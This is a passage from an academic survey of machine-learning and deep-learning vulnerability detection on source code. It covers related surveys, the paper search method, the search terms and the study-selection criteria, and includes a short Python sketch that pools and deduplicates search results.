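Because these attributes see only the shape of the code, a patched variant of copy() that adds a bounds check would change the resulting feature vector only marginally, which illustrates why such representations struggle as vulnerability signals.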
Second, we examine the trend analysis of papers on software vulnerability detection published in journals and conference proceedings because it provides a comprehensive understanding of the publishing patterns in a particular field or area of research. The trend analysis can shed light on the distribution of research output across various publication venues and the shifting preferences of researchers and authors. This information can be useful for stakeholders such as publishers, academic institutions, and researchers in making strategic decisions related to publishing, funding, and research collaborations.

Zeng et al. [151] discussed the increasing attention towards exploitable vulnerabilities in software and the development of vulnerability detection methods, specifically the application of ML techniques. The paper reviews 22 recent studies that use deep learning to detect vulnerabilities and identifies four game changers that have significantly impacted this field. The survey further compares the game changers based on different aspects of software vulnerability detection, including data source, feature representation, DL models, and detection granularity. There are a couple of differences compared to our survey. First, we analyze the trend patterns of papers on software vulnerability detection that have been published in journals and conferences. This analysis helps us gain a thorough comprehension of the publication trends in a specific area or field of research. Second, we cover more aspects of software vulnerability detection. While they only cover data source, feature representation, DL models, and detection granularity, we additionally cover vulnerability types and the interpretability of ML/DL models. Additionally, we provide a more granular analysis of the different aspects.

Kritikos et al. [71] and Sun et al. [132] focused on cybersecurity and aim to improve cyber resilience. Sun et al. [132] discussed the paradigm change in understanding and protecting against cyber threats from reactive detection to proactive prediction, with an emphasis on new research on cybersecurity incident prediction systems that use many types of data sources. Kritikos et al. [71] discussed the challenges of migrating applications to the cloud and ensuring their security, with a focus on vulnerability management during the application life cycle and the use of open-source tools and databases to better secure applications. While the topics of the two studies are different, they share a common goal of improving cybersecurity and resilience. Both highlight the importance of proactive measures to prevent or mitigate cyber threats, rather than relying solely on reactive detection and response. Additionally, both highlight the importance of utilizing various data sources and tools to improve cybersecurity measures. While both approaches aim to improve the security of applications, they differ in their focus and the techniques used. These works mainly focus on providing guidance and tools to support vulnerability management during the application life cycle, while in our survey, we focus on software vulnerability detection using ML/DL techniques on source code, which aims at automating the identification of vulnerabilities in the source code.

Khan et al. [69] focused on vulnerability assessment, which is the process of finding and fixing vulnerabilities in a computer system before they can be exploited by hackers. This highlights the necessity for more studies into automated vulnerability mitigation strategies that can effectively secure software systems. On the other hand, vulnerability identification with ML/DL approaches on source code entails analyzing an application's source code in order to spot security flaws. Instead of evaluating the safety of the entire system, this method concentrates on finding vulnerabilities in the code itself.
Nong et al. [111] explored the open-science aspects of studies on software vulnerability detection and argued that there is a dearth of research on problems of open science in software engineering, particularly with regard to software vulnerability detection. The authors conducted an exhaustive literature study and identified 55 relevant works that propose deep learning-based vulnerability detection approaches. They investigated open-science aspects including availability, executability, reproducibility, and replicability. The study reveals that only 25.5% of the examined approaches provide open-source tools. Furthermore, some open-source tools lack adequate documentation and thorough implementation, rendering them inoperable or unreplicable. The use of unbalanced or intentionally produced datasets causes the approaches' performance to be overstated, rendering them unreplicable.

Chakraborty et al. [19] investigated the performance of cutting-edge DL-based vulnerability prediction approaches in real-world vulnerability prediction scenarios. They find that the performance of the state-of-the-art DL-based techniques drops by more than 50 percent in real-world scenarios. They also discover problems with training data (for example, data duplication and an unrealistic distribution of vulnerable classes) and model selection (for example, simplistic token-based models). Existing DL-based approaches often learn unrelated artifacts instead of features related to the cause of vulnerabilities. The significant difference compared to our survey is that in our work, we focus on the usage of ML/DL models for software vulnerability detection and characterize the different stages in the pipeline of vulnerability detection, whereas they focus on the issues related to the usage of state-of-the-art DL models for software vulnerability detection.

Liu et al. [93] discussed the increasing popularity of DL techniques in software engineering
research due to their ability to address SE challenges without extensive manual feature engineering. The authors highlight two important factors often overlooked in DL studies: reproducibility and replicability. Reproducibility refers to whether other researchers can obtain the same results using the authors' artifacts, while replicability refers to obtaining similar results with re-implemented artifacts and a different experimental setup. The major difference compared to our study is that we focus on the usage of ML/DL techniques in software vulnerability detection pipelines, while they emphasize the replicability and reproducibility of the results reported in software engineering research studies.

Bi et al. [9] emphasized the importance of software vulnerability detection techniques as well as the absence of a systematic methodology to evaluate these approaches. Their research is the first to look into and describe the current state of software vulnerability detection benchmarking. The assessment examines current literature on vulnerability detection benchmarking, including methodologies employed in technique-proposing publications and empirical research. The survey examines the difficulties associated with benchmarking software vulnerability detection approaches and suggests alternative solutions to these difficulties. They do not, however, give a characterization of the datasets, representations, embedding techniques, and models employed in software vulnerability identification, unlike our work.

3 METHODOLOGY OF SYSTEMATIC SURVEY

3.1 Sources of Information

In this paper, we conducted an empirical study following [68, 115]. The purpose of this study is to collect and examine papers from 2011 to 2022 focusing on vulnerability detection across various programming languages and source code using machine learning and deep learning techniques. The period between 2011 and 2022 is an appropriate time interval for reviewing data-driven vulnerability detection for several reasons. a) Increase in the volume and diversity of software vulnerabilities: over the past decade, there has been a significant increase in the number and diversity of software vulnerabilities that have been discovered and reported². As of 2021, there exist 150,000 CVE records in the National Vulnerability Database (NVD)³. This increase has created a need for more sophisticated and effective methods for vulnerability detection, which has led to the development of new data-driven techniques. b) Advancements in ML/DL and data analytics: the past decade has seen significant advancements in machine learning, including the development of deep learning algorithms [52, 59], natural language processing techniques [34, 96], and other data-driven approaches that are highly effective in detecting software vulnerabilities. To collect papers, we searched for relevant research papers in four databases: ScienceDirect, IEEE Xplore, the ACM Digital Library, and Google Scholar.

² https://nvd.nist.gov/general/news
³ https://nvd.nist.gov/general/brief-history
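As a rough, illustrative sketch of this collection step (including the duplicate handling described later in Section 3.3), the snippet below assembles a candidate pool across the four databases for the 2011-2022 window, using the search string built from the terms listed in Section 3.2. The search_database helper is hypothetical: each portal exposes its own search interface, so a real pipeline would wrap those individually.

```python
# Illustrative sketch of the paper-collection step described above. The
# databases and 2011-2022 window come from the text; search_database() is a
# hypothetical stand-in, since ScienceDirect, IEEE Xplore, the ACM Digital
# Library, and Google Scholar each expose their own search interface.
from typing import Iterable, List, Dict

DATABASES = ["ScienceDirect", "IEEE Xplore", "ACM Digital Library", "Google Scholar"]
YEARS = range(2011, 2023)  # 2011-2022 inclusive

# Boolean query assembled from the search terms listed in Section 3.2.
QUERY = " OR ".join([
    "vulnerability detection",
    "security vulnerability detection",
    "vulnerability detection using machine learning",
    "vulnerability detection using deep learning",
    "source code security bug prediction",
    "source code vulnerability detection",
    "source code bug prediction",
])

def search_database(db: str, query: str, years: Iterable[int]) -> List[Dict]:
    """Hypothetical adapter returning records like {'title': ..., 'year': ...}."""
    raise NotImplementedError(f"wrap the search portal of {db} here")

def collect_candidates() -> List[Dict]:
    """Pool results from all databases, dropping cross-database duplicates."""
    seen, pool = set(), []
    for db in DATABASES:
        for paper in search_database(db, QUERY, YEARS):
            key = paper["title"].casefold().strip()  # normalize title for dedup
            if key not in seen:  # same study may be indexed by several databases
                seen.add(key)
                pool.append(paper)
    return pool
```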
3.2 Search Terms

From earlier work [77, 89, 125, 151] and our experience with the subject area, we identified the key phrases used in the search. The following are the search terms:

vulnerability detection OR security vulnerability detection OR vulnerability detection using machine learning OR vulnerability detection using deep learning OR source code security bug prediction OR source code vulnerability detection OR source code bug prediction

3.3 Study Selection

The process of selecting studies to be included in our survey involves the following stages: (1) initially choosing studies based on their title, (2) selecting studies after reviewing their abstracts, and (3) making further selections after reading the full papers. Note that the initial search results contain entries that are not related to security vulnerability detection. This might be caused by accidental keyword matching. We manually check each paper and remove these irrelevant papers to ensure the quality of our survey dataset. We also observe that there exist duplicate papers among the search results, since the same study could be indexed by multiple databases. We then discarded duplicate studies manually. To assist the selection of papers that have presented new ML- or DL-based models for software vulnerability identification, we provide the following inclusion criteria:

• The studies should have been peer-reviewed
• The studies should have experimental results
• The studies should employ an ML or DL technique
• The studies should improve existing data-driven vulnerability detection techniques
• The input to the ML/DL models should be either source code, commits, or byte-code

Also, we have the following exclusion criteria to filter out irrelevant papers:

• Studies focusing on other engineering domains
• Studies addressing static analysis, dynamic analysis, mutation testing, or fault localization
• Review papers
• Studies focusing on vulnerability detection for web and Android applications
• Studies belonging to one of the following categories: books, chapters, tutorials, technical reports
• Studies using code similarity or clone detection tools
• Studies focusing on malware detection on mobile devices, intrusion detection, and bug detection using static code attributes

Using these criteria, we narrow down our findings by examining each paper's title, abstract,